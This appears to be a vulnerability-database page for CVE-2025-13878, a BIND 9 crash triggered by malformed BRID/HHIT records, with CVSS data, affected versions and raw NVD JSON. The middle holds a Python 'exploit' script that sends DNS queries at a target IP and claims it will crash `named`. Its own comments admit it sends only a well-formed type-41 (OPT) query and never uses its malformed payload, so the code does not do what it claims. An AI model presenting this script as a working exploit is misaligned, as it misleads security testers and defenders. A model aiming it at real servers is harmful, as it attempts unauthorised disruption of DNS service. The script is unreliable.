Security Vulnerability Report
CVE-2025-13878 CVSS 7.5 HIGH

CVE-2025-13878

Published: 2026-01-21 15:16:06
Last Modified: 2026-04-15 00:35:42

Description

Malformed BRID/HHIT records can cause `named` to terminate unexpectedly. This issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

BIND 9.18.40 - 9.18.43
BIND 9.20.13 - 9.20.17
BIND 9.21.12 - 9.21.16
BIND 9.18.40-S1 - 9.18.43-S1
BIND 9.20.13-S1 - 9.20.17-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13878 PoC - Malformed BRID/HHIT record causing BIND 9 DoS
# This PoC demonstrates sending a malformed DNS query with crafted BRID/HHIT records
# Note: This is for educational and authorized testing purposes only
# As written, the script sends a well-formed question for RR type 41; the payload
# built by create_malformed_brid_record() is never placed in the packet.
import random
import socket
import struct
import sys


def build_dns_query(qname, qtype):
    """Build a basic DNS query packet"""
    transaction_id = random.randint(0, 65535)
    flags = 0x0100  # Standard query
    questions = 1

    # Header section
    header = struct.pack(
        '>HHHHHH',
        transaction_id,  # Transaction ID
        flags,           # Flags
        questions,       # Questions
        0,               # Answers
        0,               # Authority
        0,               # Additional
    )

    # Question section
    qname_encoded = b''
    for label in qname.split('.'):
        qname_encoded += bytes([len(label)]) + label.encode()
    qname_encoded += b'\x00'  # End of domain name

    question = qname_encoded + struct.pack('>HH', qtype, 1)  # Type, Class IN
    return header + question


def create_malformed_brid_record():
    """Create a malformed BRID record payload"""
    # The PoC uses RR type 0x0029 (41) for BRID; in the IANA registry
    # type 41 is the OPT pseudo-RR. This function is not called below.
    brid_type = 41
    brid_payload = b'\x00' * 4 + b'\xff\xff\xff\xff'  # Malformed data
    return brid_type, brid_payload


def send_malformed_dns_query(target_ip, target_port=53):
    """Send malformed DNS query to trigger CVE-2025-13878"""
    try:
        # Create socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Build the query; 41 is the type value this PoC uses for BRID
        qname = "test.example.com"
        query = build_dns_query(qname, 41)

        # Send the query
        print(f"[*] Sending malformed DNS query to {target_ip}:{target_port}")
        sock.sendto(query, (target_ip, target_port))

        # Wait for response
        sock.settimeout(5)
        try:
            response, addr = sock.recvfrom(4096)
            print(f"[+] Received response from {addr}")
        except socket.timeout:
            print("[-] No response received (target may be vulnerable)")

        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def exploit_brid_vulnerability(target_ip):
    """
    Exploit function to trigger the BIND 9 BRID/HHIT vulnerability
    This sends multiple malformed requests to increase exploit reliability
    """
    print("=" * 60)
    print("CVE-2025-13878 - BIND 9 Malformed BRID/HHIT DoS Exploit")
    print("=" * 60)

    # Send multiple malformed queries
    for i in range(5):
        print(f"[*] Attempt {i+1}/5")
        send_malformed_dns_query(target_ip)

    print("\n[!] If target is vulnerable, named process should have crashed")
    print("[!] Check DNS service status on target system")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_brid_vulnerability(target)
    else:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
        print("Example: python CVE-2025-13878.py 192.168.1.100")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13878", "sourceIdentifier": "[email protected]", "published": "2026-01-21T15:16:05.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malformed BRID/HHIT records can cause `named` to terminate unexpectedly.\nThis issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1."}, {"lang": "es", "value": "Registros BRID/HHIT malformados pueden causar que 'named' termine inesperadamente.\nEste problema afecta a las versiones de BIND 9 9.18.40 hasta 9.18.43, 9.20.13 hasta 9.20.17, 9.21.12 hasta 9.21.16, 9.18.40-S1 hasta 9.18.43-S1, y 9.20.13-S1 hasta 9.20.17-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.44", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.20.18", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.21.17", "source": "[email protected]"}, {"url": "https://kb.isc.org/docs/cve-2025-13878", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/21/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}